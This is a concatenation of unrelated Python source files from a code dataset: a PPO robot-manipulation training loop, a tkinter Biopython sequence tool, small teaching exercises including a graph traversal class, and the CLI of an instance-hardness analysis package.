    ppo = PPO(state_dim, action_dim, action_std, lr, betas, gamma, K_epochs, eps_clip)
    print(lr,betas)

    # logging variables
    running_reward = 0
    avg_length = 0
    time_step = 0

    # training loop: one PPO update per epoch, after max_episodes of rollouts
    for epoch in range(350):
        running_reward = 0
        avg_length = 0
        time_step = 0
        for i_episode in range(1, max_episodes+1):
            episode_success_rate = []
            state_ = env.reset()
            env.env.reward_type = 'dense'
            obs = state_['observation']
            g = state_['desired_goal']
            #clip the oberservation and goal into range -200, 200
            #obs, g = _preproc_og(obs, g)
            state = np.concatenate([obs,g])
            local_timestep = 0
            for t in range(env._max_episode_steps):
                local_timestep += 1
                time_step +=1
                # Running policy_old:
                action = ppo.select_action(state, memory)
                state_, reward, done, info = env.step(action)
                #episode_success_rate.append(info['is_success'])
                #env.render()
                obs = state_['observation']
                g = state_['desired_goal']
                #obs, g = _preproc_og(obs, g)
                state = np.concatenate([obs,g])
                # Saving reward and is_terminals:
                memory.rewards.append(reward)
                memory.is_terminals.append(done)
                running_reward += reward
                if done :
                    break
            # episode that finished early means the goal was reached
            if local_timestep<49:
                print('Goaaaaaaaaaaaaaaaal')
            #episode_success_rate = np.array(episode_success_rate)
            #episode_success_rate = np.mean(episode_success_rate)
            avg_length += t

            # stop training if avg_reward > solved_reward
            if running_reward > (log_interval*solved_reward):
                torch.save(ppo.policy.state_dict(), '/home/muhyahiarl/ppo_grad_project/PPO_continuous_{}.pth'.format(env_name))
                print("########## Solved! ##########")
                break

            # save every 400 episodes
            if i_episode % 400 == 0:
                torch.save(ppo.policy.state_dict(), '/home/muhyahiarl/ppo_grad_project/PPO_continuous_{}.pth'.format(env_name))
                print('updated')

            # logging
            '''
            if i_episode % log_interval == 0:
                avg_length = int(avg_length/log_interval)
                running_reward = int((running_reward/log_interval))
                print('Episode {} \t Avg length: {} \t Avg reward: {}'.format(i_episode, avg_length, running_reward))
                running_reward = 0
                avg_length = 0
            '''

        # one PPO update on everything collected this epoch
        print('reach here_0')
        ppo.update(memory)
        print('reach here_1')
        #memory.clear_memory()
        time_step = 0
        state_ = env.reset()
        env.env.reward_type = 'dense'
        print('reach here_2')
        obs = state_['observation']
        g = state_['desired_goal']
        state = np.concatenate([obs,g])
        local_timestep = 0

        # evaluation: 10 episodes, mean per-step success rate per episode
        test_success_rate = []
        for _ in range(10):
            local_success_rate = []
            state_ = env.reset()
            state = np.concatenate([state_['observation'], state_['desired_goal']])
            for t in range(env._max_episode_steps):
                local_timestep += 1
                time_step +=1
                # Running policy_old:
                action = ppo.select_action(state, memory)
                state_, reward, done, info = env.step(action)
                obs = state_['observation']
                g = state_['desired_goal']
                #obs, g = _preproc_og(obs, g)
                state = np.concatenate([obs ,g])
                local_success_rate.append(info['is_success'])
                if done:
                    break
            local_success_rate = np.array(local_success_rate)
            test_success_rate.append(np.mean(local_success_rate))
        local_test_success = np.mean(np.array(test_success_rate))
        epoch_success_rate.append(local_test_success)
        print('epoch ' +str(epoch) +' success rate is ',local_test_success)
        # evaluation rollouts were recorded into memory too; drop everything
        memory.clear_memory()
        avg_length += t

    # NOTE(review): dead code — never called, and it reads names
    # (env, ppo, memory) from the enclosing scope while assigning to
    # local_timestep/time_step, which would raise UnboundLocalError if invoked.
    def _eval_agent():
        test_success_rate = []
        for _ in range(10):
            local_success_rate = []
            state_ = env.reset()
            state = np.concatenate([state_['observation'], state_['desired_goal']])
            for t in range(env._max_episode_steps):
                local_timestep += 1
                time_step +=1
                # Running policy_old:
                action = ppo.select_action(state, memory)
                state_, reward, done, info = env.step(action)
                obs = state_['observation']
                g = state_['desired_goal']
                #obs, g = _preproc_og(obs, g)
                state = np.concatenate([obs ,g])
                local_success_rate.append(info['is_success'])
                if done:
                    break
            local_success_rate = np.array(local_success_rate)
            test_success_rate.append(np.mean(local_success_rate))
        return test_success_rate
if __name__ == '__main__':
    launch()
    # launch() appends per-epoch success rates to the module-level list;
    # persist them once training finishes
    np.savetxt('/home/muhyahiarl/ppo_grad_project/ppo_grad_project_handmanipulateeggfull_nepoch_350.txt',epoch_success_rate,delimiter=',')
|
15,916 | f90702994999ed20780f4d587ee70b65478dfbfb | from Bio import SeqIO
from Bio import pairwise2
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna# i need to change it
from Bio.SubsMat import MatrixInfo as matlist
from tkinter import filedialog
import tkinter.messagebox
import tkinter as tk
import pyperclip
from tkinter import ttk
from dict_values import *
# ---- main window and drawing canvas ----
root= tk.Tk()
root.title('BioSeq Tool - by Haller-x (GLA7)')
canvas1 = tk.Canvas(root, width = 600, height = 600, relief = 'raised')
canvas1.pack()

# ---- headline labels ----
label_bio_seq = tk.Label(root, text='Bio Seq')
label_bio_seq.config(font=('helvetica', 25,'bold'))
canvas1.create_window(300, 50, window=label_bio_seq)

label_sub = tk.Label(root, text='Transcription, Translation and Replication')
label_sub.config(font=('helvetica', 12,'bold'))
canvas1.create_window(300, 100, window=label_sub)

# ---- labels: Transcription, Translation and Replication panel ----
label_dna_seq = tk.Label(root, text='DNA seq:')
label_dna_seq.config(font=('helvetica', 11))
canvas1.create_window(195, 140, window=label_dna_seq)

label_complementary_dna = tk.Label(root, text='Complementary DNA:')
label_complementary_dna.config(font=('helvetica', 11))
canvas1.create_window(155, 180, window=label_complementary_dna)

label_rna = tk.Label(root, text='RNA:')
label_rna.config(font=('helvetica', 11))
canvas1.create_window(210, 220, window=label_rna)

label_seq_aa = tk.Label(root, text='Seq AA:')
label_seq_aa.config(font=('helvetica', 11))
canvas1.create_window(200, 260, window=label_seq_aa)

# ---- horizontal divider (drawn as a label of underscores) ----
label__ = tk.Label(root, text='_______________________________________________________________________________________________________________')
label__.config(font=('helvetica', 12))
canvas1.create_window(100, 300, window=label__)

# ---- labels: nucleotide pairwise-alignment panel ----
label_pairwise = tk.Label(root, text=' Pairwise simple alignment-Nucleotides')
label_pairwise.config(font=('helvetica', 11,'bold'))
canvas1.create_window(140, 340, window=label_pairwise)

label_dna_seq1_pairwise = tk.Label(root, text='First Seq:')
label_dna_seq1_pairwise.config(font=('helvetica', 11))
canvas1.create_window(80, 370, window=label_dna_seq1_pairwise)

label_dna_seq2_pairwise = tk.Label(root, text='Second Seq:')
label_dna_seq2_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 400, window=label_dna_seq2_pairwise)

label_match_weight_pairwise = tk.Label(root, text='Match weight:')
label_match_weight_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 430, window=label_match_weight_pairwise)

label_mismatch_weight_pairwise = tk.Label(root, text='Mismatch weight:')
label_mismatch_weight_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 460, window=label_mismatch_weight_pairwise)

label_gap_open = tk.Label(root, text='Gap open:')
label_gap_open.config(font=('helvetica', 11))
canvas1.create_window(70, 490, window=label_gap_open)

label_gap_extend = tk.Label(root, text='Gap extend:')
label_gap_extend.config(font=('helvetica', 11))
canvas1.create_window(70, 520, window=label_gap_extend)

# ---- labels: protein matrix-alignment panel ----
label_pairwise_prot = tk.Label(root, text=' Pairwise simple alignment-Protein')
label_pairwise_prot.config(font=('helvetica', 11,'bold'))
canvas1.create_window(425, 340, window=label_pairwise_prot)

label_dna_seq1_matrix = tk.Label(root, text='First protein:')
label_dna_seq1_matrix.config(font=('helvetica', 11))
canvas1.create_window(380, 370, window=label_dna_seq1_matrix)

label_dna_seq2_matrix = tk.Label(root, text='Second protein:')
label_dna_seq2_matrix.config(font=('helvetica', 11))
canvas1.create_window(370, 400, window=label_dna_seq2_matrix)

label_matrix = tk.Label(root, text='Matrix:')
label_matrix.config(font=('helvetica', 11))
canvas1.create_window(395, 430, window=label_matrix)

# drop-down of every substitution matrix exposed by Bio.SubsMat.MatrixInfo
var = tk.StringVar(root)
var.set("matlist.benner6")
optionMatrix = tk.OptionMenu(root, var, 'matlist.benner6', 'matlist.benner22', 'matlist.benner74', 'matlist.blosum100', 'matlist.blosum30', 'matlist.blosum35', 'matlist.blosum40', 'matlist.blosum45', 'matlist.blosum50','matlist.blosum55', 'matlist.blosum60', 'matlist.blosum62', 'matlist.blosum65', 'matlist.blosum70','matlist.blosum75', 'matlist.blosum80', 'matlist.blosum85', 'matlist.blosum90', 'matlist.blosum95','matlist.feng', 'matlist.fitch', 'matlist.genetic', 'matlist.gonnet', 'matlist.grant', 'matlist.ident', 'matlist.johnson', 'matlist.levin', 'matlist.mclach','matlist.miyata', 'matlist.nwsgappep', 'matlist.pam120', 'matlist.pam180', 'matlist.pam250', 'matlist.pam30', 'matlist.pam300', 'matlist.pam60', 'matlist.pam90', 'matlist.rao', 'matlist.risler', 'matlist.structure')
canvas1.create_window(485, 430, window=optionMatrix)
# NOTE(review): var.get() is read once at startup, so later menu selections
# are never reflected in `chosen` — confirm whether this is intended.
chosen_matrix = var.get()
chosen = dict_matrix[chosen_matrix]

# ---- entries: DNA panel ----
entry_dna_seq = tk.Entry (root)         # DNA sequence input
canvas1.create_window(300, 140, window=entry_dna_seq)

entry_complementary_dna = tk.Entry (root)   # complementary DNA output
canvas1.create_window(300, 180, window=entry_complementary_dna)

entry_rna = tk.Entry (root)             # RNA output
canvas1.create_window(300, 220, window=entry_rna)

entry_seq_aa = tk.Entry (root)          # amino-acid sequence output
canvas1.create_window(300, 260, window=entry_seq_aa)

# ---- entries: nucleotide alignment panel ----
entry_seq_dna1_pairwise = tk.Entry (root)
canvas1.create_window(195, 370, window=entry_seq_dna1_pairwise)

entry_seq_dna2_pairwise = tk.Entry (root)
canvas1.create_window(195, 400, window=entry_seq_dna2_pairwise)

entry_match_weight_pairwise = tk.Entry (root)
canvas1.create_window(195, 430, window=entry_match_weight_pairwise)

entry_mismatch_weight_pairwise = tk.Entry (root)
canvas1.create_window(195, 460, window=entry_mismatch_weight_pairwise)

entry_gap_open = tk.Entry (root)
canvas1.create_window(195, 490, window=entry_gap_open)

entry_gap_extend = tk.Entry (root)
canvas1.create_window(195, 520, window=entry_gap_extend)

# ---- entries: protein matrix-alignment panel ----
entry_prot_seq1_matrix = tk.Entry (root)
canvas1.create_window(485, 370, window=entry_prot_seq1_matrix)

entry_prot_seq2_matrix = tk.Entry (root)
canvas1.create_window(485, 400, window=entry_prot_seq2_matrix)
def error_dna_codon():
    """Warn the user that the DNA sequence length is not a multiple of three."""
    tkinter.messagebox.showerror('Warning', 'Sequence not a multiple of three')

def wrong_input():
    """Report that the provided text is not a valid sequence."""
    tkinter.messagebox.showerror('Error', 'Not a valid sequence')
#maybe add some conference for ATGC
def generateTTR():
    """Read the DNA entry field, compute complement/RNA/protein, and fill the
    three result fields; shows an error dialog on invalid input."""
    try:
        dnaC = generate_dnc_c(entry_dna_seq.get())
        # warn (but continue) when the length is not a whole number of codons
        if len(entry_dna_seq.get()) % 3 != 0:
            error_dna_codon()
        rna = generate_rna(entry_dna_seq.get())
        prot = generate_prot(entry_dna_seq.get())
        clear()
        entry_complementary_dna.insert(0, str(dnaC))
        entry_rna.insert(0, rna)
        entry_seq_aa.insert(0, prot)
    except Exception:
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
        wrong_input()
def clear():
    """Empty the three result fields before fresh values are written."""
    for result_entry in (entry_complementary_dna, entry_rna, entry_seq_aa):
        result_entry.delete(0, 'end')
def generate_dnc_c(dna_seq):
    """Return the complementary strand of *dna_seq* as a Bio.Seq object.

    NOTE(review): Bio.Alphabet (generic_dna) was removed in Biopython 1.78;
    this module requires an older Biopython release.
    """
    dnaM = Seq(dna_seq, generic_dna)
    dnaC = dnaM.complement()
    return dnaC

def generate_rna(dna_seq):
    """Transcribe the *complement* of dna_seq into RNA.

    NOTE(review): transcribing the complement (rather than dna_seq itself)
    treats the input as the template strand — confirm that is intended.
    """
    dnaM = Seq(dna_seq, generic_dna)
    dnaC = dnaM.complement()  # unused intermediate, kept from the original
    rna = dnaM.complement().transcribe()
    return rna

def generate_prot(dna_seq):
    """Translate the RNA obtained from the complement of dna_seq.

    Uses the standard codon table (table=1) and translates through stop
    codons (to_stop=False).
    """
    dnaM = Seq(dna_seq, generic_dna)
    dnaC = dnaM.complement()  # unused intermediate, kept from the original
    rna = dnaM.complement().transcribe()
    prot = rna.translate(to_stop=False, table=1)
    return prot
# Copy functions: push the current field contents onto the system clipboard.
def copy_dnam():
    # clipboard <- complementary-DNA field
    pyperclip.copy(entry_complementary_dna.get())

def copy_rna():
    # clipboard <- RNA field
    pyperclip.copy(entry_rna.get())

def copy_seq_aa():
    # clipboard <- amino-acid field
    pyperclip.copy(entry_seq_aa.get())
# save functions (bioseq): write a result field to a user-chosen text file
def _save_text_to_file(content):
    """Ask for a destination .txt file and write *content* to it.

    NOTE(review): creates a second Tk root for the dialog (kept from the
    original); reusing the existing `root` would be cleaner.
    """
    dialog_root = tk.Tk()
    dialog_root.withdraw()
    dialog_root.filename = filedialog.asksaveasfilename(
        title = "Save as ", defaultextension='.txt',
        filetypes = (("txt files","*.txt"),))
    with open(dialog_root.filename, "w") as out_file:
        out_file.write(content)

def save_fasta_dnac():
    """Save the complementary-DNA field to a text file."""
    _save_text_to_file(entry_complementary_dna.get())

def save_fasta_rna():
    """Save the RNA field to a text file."""
    _save_text_to_file(entry_rna.get())

def save_fasta_seq_aa():
    """Save the amino-acid field to a text file."""
    _save_text_to_file(entry_seq_aa.get())
def pairwise_seq():
    """Run a global pairwise alignment with user-supplied scoring weights.

    Reads both sequences and the four scores from the entry fields, saves the
    formatted alignment to a user-chosen text file and returns it.  Errors pop
    a dialog instead of raising.
    """
    try:
        seq1 = entry_seq_dna1_pairwise.get()
        seq2 = entry_seq_dna2_pairwise.get()
        # Entry.get() returns strings; pairwise2.align.globalms requires
        # numeric match/mismatch/gap parameters, so convert explicitly
        # (the original passed raw strings, which always fell into except).
        match_weight = float(entry_match_weight_pairwise.get())
        mismatch_weight = float(entry_mismatch_weight_pairwise.get())
        gap_open = float(entry_gap_open.get())
        gap_extend = float(entry_gap_extend.get())
        align = pairwise2.align.globalms(seq1, seq2, match_weight, mismatch_weight, gap_open, gap_extend)
        save_pairwise = tk.Tk()
        save_pairwise.withdraw()
        save_pairwise.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
        with open(save_pairwise.filename, "w") as save_pairwise_out:
            save_pairwise_out.write(pairwise2.format_alignment(*align[0]))
        return (pairwise2.format_alignment(*align[0]))
    except:
        tkinter.messagebox.showerror('Error', 'Not a valid sequence or values\nUse dot instead of comma')
def clear_pairwise():
    """Blank every pairwise-alignment input field."""
    for widget in (entry_seq_dna1_pairwise, entry_seq_dna2_pairwise,
                   entry_match_weight_pairwise, entry_mismatch_weight_pairwise,
                   entry_gap_open, entry_gap_extend):
        widget.delete(0, 'end')
def pairwise_default_seq(match_pesos=5,mismatch_pesos=-4,gap_abertura=-2,gap_extensao=-0.5):
    """Global alignment with default scores (match 5, mismatch -4, open -2, extend -0.5).

    Reads both sequences from the entry fields, saves the formatted alignment
    to a user-chosen text file and returns it; errors pop a dialog.
    """
    try:
        seq1 = entry_seq_dna1_pairwise.get()
        seq2 = entry_seq_dna2_pairwise.get()
        align= pairwise2.align.globalms(seq1,seq2,match_pesos,mismatch_pesos,gap_abertura,gap_extensao)
        save_pairwise_def = tk.Tk()
        save_pairwise_def.withdraw()
        save_pairwise_def.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
        with open(save_pairwise_def.filename, "w") as save_pairwise_def_out:
            save_pairwise_def_out.write(pairwise2.format_alignment(*align[0]))
        return (pairwise2.format_alignment(*align[0]))
    except:
        tkinter.messagebox.showerror('Error', 'Not a valid sequence')
def clear_matrix_default():
    """Blank both protein-sequence fields of the matrix-alignment panel."""
    for widget in (entry_prot_seq1_matrix, entry_prot_seq2_matrix):
        widget.delete(0, 'end')
# functions matrix pairwise
def alignment_matrix():
    """Align the two protein sequences using the GUI-selected substitution matrix.

    NOTE(review): `chosen_matrix` and `dict_matrix` are module-level state not
    visible in this section -- presumably set by a matrix-selection widget;
    confirm they are initialised before this callback can fire.
    """
    try:
        seq1 = entry_prot_seq1_matrix.get()
        seq2 = entry_prot_seq2_matrix.get()
        chosen = dict_matrix[chosen_matrix]
        alinhamento = pairwise2.align.globaldx(seq1,seq2,chosen)
        save_pairwise_prot = tk.Tk()
        save_pairwise_prot.withdraw()
        save_pairwise_prot.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
        with open(save_pairwise_prot.filename, "w") as save_pairwise_prot_out:
            save_pairwise_prot_out.write(pairwise2.format_alignment(*alinhamento[0]))
    except:
        tkinter.messagebox.showerror('Error', 'Not a valid sequence')
#
# buttons
# -- DNA panel: run the conversion and copy results to the clipboard --
button_run_dna = tk.Button(text='Run!', command=generateTTR, bg='blue', fg='white', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 140, window=button_run_dna)  # run DNA conversion
button_copy_complementary_dna = tk.Button(text='Copy!', command=copy_dnam, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 180, window=button_copy_complementary_dna)  # copy dna complementary
button_copy_rna = tk.Button(text='Copy!', command=copy_rna, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 220, window=button_copy_rna)  # copy rna
button_copy_seq_aa = tk.Button(text='Copy!', command=copy_seq_aa, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 260, window=button_copy_seq_aa)  # copy seq AA
## save buttons
button_save_dnaC = tk.Button(text='Save as txt!', command=save_fasta_dnac, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480, 180, window=button_save_dnaC)  # save complementary DNA
bbutton_save_rna = tk.Button(text='Save as txt!', command=save_fasta_rna, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480, 220, window=bbutton_save_rna)  # save RNA
button_save_seq_aa = tk.Button(text='Save as txt!', command=save_fasta_seq_aa, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480,260, window=button_save_seq_aa)  # save seq AA
# run and clear buttons for the two alignment panels
button_run_pairwisealignment = tk.Button(text='Run!', command=pairwise_seq, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(240,555, window=button_run_pairwisealignment)
button_run_pairwisealignment_default = tk.Button(text='Run default!', command=pairwise_default_seq, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(180,555, window=button_run_pairwisealignment_default)
button_clear_pairwisealignment_default = tk.Button(text='Clear fields', command=clear_pairwise, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(100,555, window=button_clear_pairwisealignment_default)
button_run_matrix_alignment = tk.Button(text='Run!', command=alignment_matrix, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(530,460, window=button_run_matrix_alignment)
button_clear_matrix_alignment = tk.Button(text='Clear fields', command=clear_matrix_default, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(470,460, window=button_clear_matrix_alignment)
# Enter the Tk event loop (blocks until the window is closed).
root.mainloop()
|
15,917 | 23846d7ee46b5179d47df2a212b1232419786abc | students = [
{'name': 'Rezso', 'age': 9.5, 'candies': 2},
{'name': 'Gerzson', 'age': 10, 'candies': 1},
{'name': 'Aurel', 'age': 7, 'candies': 3},
{'name': 'Zsombor', 'age': 12, 'candies': 5}
]
def many_candies():
    """Print each student holding more than four candies."""
    for student in students:
        if student["candies"] > 4:
            print(student["name"] + " has more, than four candies.")
def ave():
    """Print the mean number of candies across all students."""
    total = 0
    for student in students:
        total += student["candies"]
    print(total / len(students))
# Demo run: report big candy holders, then print the average.
many_candies()
ave()
15,918 | 66a7f931409aed302bce698737d190053f870d0f | class Graph:
def __init__(self, graphDictionary = None):
if graphDictionary is None:
graphDictionary = {}
self.graphDictionary = graphDictionary
def getVertices(self):
return list(self.graphDictionary.keys())
    def edges(self):
        """Public alias for findEdges(): the graph's undirected edge list."""
        return self.findEdges()
def findEdges(self):
edgeName = []
for vertex in self.graphDictionary:
for nextVertex in self.graphDictionary[vertex]:
if {nextVertex, vertex} not in edgeName:
edgeName.append({vertex, nextVertex})
return edgeName
def addVertex(self, vertex):
if vertex not in self.graphDictionary:
self.graphDictionary[vertex] = {}
def addEdge(self, edge):
edge = set(edge)
(vertex1, vertex2) = tuple(edge)
if vertex1 in self.graphDictionary:
self.graphDictionary[vertex].append(vertex2)
else:
self.graphDictionary[vertex1] = [vertex2]
def depthFirstSearch(self, start,visited = set()):
if start not in visited:
print(start)
visited.add(start)
for neighbour in self.graphDictionary[start]:
self.depthFirstSearch(neighbour)
def breadthFirstSearch(self, start):
visited = set()
queue = []
visited.add(start)
queue.append(start)
while queue:
firstQueueItem = queue.pop(0)
print(firstQueueItem, end=' ')
for neighbour in self.graphDictionary[firstQueueItem]:
if neighbour not in visited:
visited.add(neighbour)
queue.append(neighbour)
# Sample adjacency mapping exercised by the demo calls below.
graphElements = {
    "a" : ["b", "c"],
    "b" : ["d", "e"],
    "c" : ["f"],
    "d" : [],
    "e" : ["f"],
    "f" : [],
}
graph = Graph(graphElements)
# print(graph.getVertices())
# print(graph.findEdges())
# print(graph.depthFirstSearch('a'))
# NOTE(review): both traversals print as a side effect and return None, so
# each outer print() emits an extra "None" line.
print(graph.depthFirstSearch('a'))
print(graph.breadthFirstSearch('a'))
15,919 | 107fc08ab288fe2258f92e73b997b17bf8be0d26 | import sys
import argparse
import logging
import shutil
import time
import os
from inspect import signature, Parameter
from pathlib import Path
import pandas as pd
from pyispace.example import save_opts
from pyispace.trace import trace_build_wrapper, make_summary, _empty_footprint
from pyispace.utils import save_footprint, scriptcsv
from . import integrator, formatter
from .context import Configuration, Workspace
from .feature_selection import featfilt
from .metrics import loss_threshold
from .visualization import Demo, AppClassification
_conf_file = 'config.yaml'
def main(args):
    """Run the PyHard pipeline: metadata build, ISA, and the optional app.

    Driven by the parsed CLI flags in *args* and the YAML configuration file
    (default ./config.yaml, overridable via --config).  Exits the process with
    status 1 on configuration errors and 0 on success.
    """
    start = time.time()
    logger = logging.getLogger(__name__)
    _my_path = Path().absolute()
    if args.other is None:
        config_path = _my_path / _conf_file
    else:
        config_path = args.other
    with Configuration(config_path) as conf:
        logger.info(f"Configuration file: '{str(config_path)}'")
        # Resolve relative config paths against the current working directory.
        for name, path_str in conf.get(['rootdir', 'matildadir', 'datafile']).items():
            if path_str is None:
                continue
            path = Path(path_str)
            if not path.is_absolute():
                abs_path = _my_path / path
                abs_path = abs_path.resolve()
                if abs_path.exists():
                    conf.set(name, str(abs_path))
                else:
                    logger.error("Invalid '{0}': '{1}'.".format(name, abs_path))
                    sys.exit(1)
        file_path = Path(conf.get('datafile'))
        if file_path.is_file():
            logger.info("Reading input dataset: '{0}'".format(file_path))
            df_dataset = pd.read_csv(file_path)
        else:
            logger.error("Invalid datafile '{0}'.".format(file_path))
            sys.exit(1)
        # The seed is exported through the environment so downstream code
        # (workers) can pick it up.
        seed = conf.get('seed')
        if isinstance(seed, int):
            os.environ["PYHARD_SEED"] = repr(seed)
            logger.info(f"Seed={seed}")
        else:
            os.environ["PYHARD_SEED"] = ""
            logger.info(f"Using random seed")
        kwargs = conf.get_full()
        rootdir_path = Path(conf.get('rootdir'))
        problem = str.lower(conf.get('problem'))
        if problem in {'classification', 'regression'}:
            logger.info(f"Type of problem: '{problem}'")
        else:
            logger.error(f"Unknown problem type '{problem}'.")
            sys.exit(1)
        if args.meta:
            logger.info("Building metadata.")
            df_metadata, df_ih = integrator.build_metadata(data=df_dataset, return_ih=True,
                                                           verbose=args.verbose, **kwargs)
        else:
            # Reuse artifacts saved by a previous run.
            df_metadata = pd.read_csv(rootdir_path / 'metadata.csv', index_col='instances')
            df_ih = pd.read_csv(rootdir_path / 'ih.csv', index_col='instances')
        if args.isa:
            if conf.get('feat_select'):
                n_feat_cols = len(df_metadata.filter(regex='^feature_').columns)
                if n_feat_cols > conf.get('max_n_features'):
                    logger.info("Feature selection on")
                    if 'df_metadata' not in locals():
                        df_metadata = pd.read_csv(rootdir_path / 'metadata.csv', index_col='instances')
                    df_metadata.to_csv(rootdir_path / 'metadata_original.csv')
                    # Forward only the kwargs that featfilt() actually accepts.
                    sig = signature(featfilt)
                    param_dict = {param.name: kwargs[param.name] for param in sig.parameters.values()
                                  if param.kind == param.POSITIONAL_OR_KEYWORD and param.default != Parameter.empty and
                                  param.name in kwargs}
                    selected, df_metadata = featfilt(df_metadata, **param_dict)
                    logger.info("Selected features: {0}".format(selected))
                    df_metadata.to_csv(rootdir_path / 'metadata.csv')
                else:
                    logger.info("Skipping feature selection: "
                                "number of features already satisfied "
                                f"({n_feat_cols} <= max_n_features ({conf.get('max_n_features')}))")
            else:
                logger.info("Feature selection off")
            isa_engine = str.lower(conf.get('isa_engine'))
            logger.info(f"Running Instance Space Analysis with {repr(isa_engine)} engine.")
            if isa_engine == 'python':
                # changes ISA 'perf':'epsilon' option
                epsilon = conf.get('perf_threshold')
                if epsilon == 'auto':
                    n_classes = df_dataset.iloc[:, -1].nunique()
                    epsilon = loss_threshold(n_classes, metric=conf.get('metric'))
                other = {'perf': {'epsilon': epsilon}}
                model = integrator.run_isa(rootdir=rootdir_path, metadata=df_metadata, settings=other,
                                           rotation_adjust=conf.get('adjust_rotation'), save_output=False)
                threshold = conf.get('ih_threshold')
                pi = conf.get('ih_purity')
                logger.info("Calculating instance hardness footprint area")
                logger.info(f"An instance is easy if its IH-value <= {threshold}")
                Ybin = df_ih.values[:, 0] <= threshold
                ih_fp = trace_build_wrapper(model.pilot.Z, Ybin, pi)
                # Calculate IH summary
                ih_summary = make_summary(space=model.trace.space, good=[ih_fp], best=[_empty_footprint()],
                                          algolabels=['instance_hardness'])
                model.trace.summary = model.trace.summary.append(ih_summary)
                # Save footprints and models
                save_footprint(ih_fp, rootdir_path, 'instance_hardness')
                scriptcsv(model, rootdir_path)
            elif isa_engine == 'matlab':
                _ = integrator.run_matilda(metadata=df_metadata, rootdir=conf.get('rootdir'),
                                           matildadir=conf.get('matildadir'))
            elif isa_engine == 'matlab_compiled':
                integrator.run_matilda_module(rootdir=rootdir_path)
            else:
                logger.error(f"Unknown ISA engine '{repr(isa_engine)}'.")
                sys.exit(1)
        if args.app:
            logging.getLogger().setLevel(logging.WARNING)
            ws = Workspace(rootdir_path, file_path)
            ws.load()
            if problem == 'classification':
                app = AppClassification(ws)
            elif problem == 'regression':
                # app = AppRegression(ws)
                raise NotImplementedError("Regression problems not yet supported. Coming soon!")
            app.show(port=5001, show=args.browser)
    end = time.time()
    elapsed_time = end - start
    if elapsed_time < 60:
        logger.info(f"Total elapsed time: {elapsed_time:.1f}s")
    else:
        logger.info(f"Total elapsed time: {int(elapsed_time//60)}m{int((elapsed_time/60 - elapsed_time//60)*60)}s")
    logger.info("Instance Hardness analysis finished.")
    sys.exit(0)
def cli():
    """Command-line entry point: parse flags, set up logging, dispatch.

    Dispatch order: --demo serves the toy-dataset demo, --app launches the
    visualization on saved artifacts, -F/--files writes default config files,
    otherwise the full pipeline (main) runs.
    """
    parser = argparse.ArgumentParser(description="PyHard - Python Instance Hardness Framework. \n"
                                                 "If you find a bug, please open an issue in our repo: "
                                                 "https://gitlab.com/ita-ml/pyhard/-/issues")
    parser.add_argument('-F', '--files', dest='generate', action='store_true', default=False,
                        help="generate configuration files locally")
    parser.add_argument('--app', dest='app', action='store_true', default=False,
                        help="run app to visualize data")
    parser.add_argument('--demo', dest='demo', action='store_true', default=False,
                        help="run demo for toy datasets")
    parser.add_argument('--no-meta', dest='meta', action='store_false',
                        help="does not generate a new metadata file; uses previously saved instead")
    parser.add_argument('--no-isa', dest='isa', action='store_false',
                        help="does not execute the instance space analysis")
    parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', default=False,
                        help="verbose mode")
    parser.add_argument('--no-browser', dest='browser', action='store_false', default=True,
                        help="run app without opening browser")
    parser.add_argument('-c', '--config', dest='other', default=None, required=False,
                        metavar='FILE', help="specifies a path to a config file other than default")
    args = parser.parse_args()
    print("run 'pyhard --help' to see all options.")
    # Console handler: DEBUG when verbose, INFO otherwise.
    sh = logging.StreamHandler()
    if args.verbose:
        sh.setLevel(logging.DEBUG)
    else:
        sh.setLevel(logging.INFO)
    sh.setFormatter(formatter)
    logging.getLogger().addHandler(sh)
    if args.demo:
        print("Press ^C to exit demo")
        demo = Demo()
        pane = demo.display()
        pane.servable()
        pane.show(title="Demo", port=5001, websocket_origin=['127.0.0.1:5001', 'localhost:5001'])  # threaded=True
    elif args.app:
        print("Press ^C to exit app")
        # App-only mode: reuse saved artifacts, skip metadata and ISA stages.
        args.isa = False
        args.meta = False
        main(args)
    elif args.generate:
        src = Path(__file__).parent
        dest = Path().absolute()
        shutil.copy(src / f'conf/{_conf_file}', dest)
        save_opts(dest)
        print("Default config files generated!")
    else:
        logging.getLogger().setLevel(logging.INFO)
        main(args)
|
15,920 | 747e8f0aaa5ee872bcc56f78e5793cec1f63d4fc | #Input : {“Gfg” : [4, 7, 5], “Best” : [8, 6, 7], “is” : [9, 3, 8]}, K = 2
#Output : [5, 7, 8]
from operator import itemgetter

# Extract the K-th element of every value list of the mapping.
# (Renamed from `input`, which shadowed the builtin, and dropped the
# leftover per-item debug print; the manual append loop is now a
# comprehension.)
data = {"gfg" : [4, 7, 5], "best" : [8, 6, 7], "abc" : [9, 3, 8]}
k = 0
final = [values[k] for values in data.values()]
print(final)
"""
other method:1
res = list(map(itemgetter(k), data.values()))
print(res)
other method:2
res = [sub[k] for sub in data.values()]
print(res)
"""
15,921 | 05c913aa2227e64c1166fcf18c2583ddf835511e | """
Bonfire Core Cache
(c) 2019,2020 The Bonfire Project
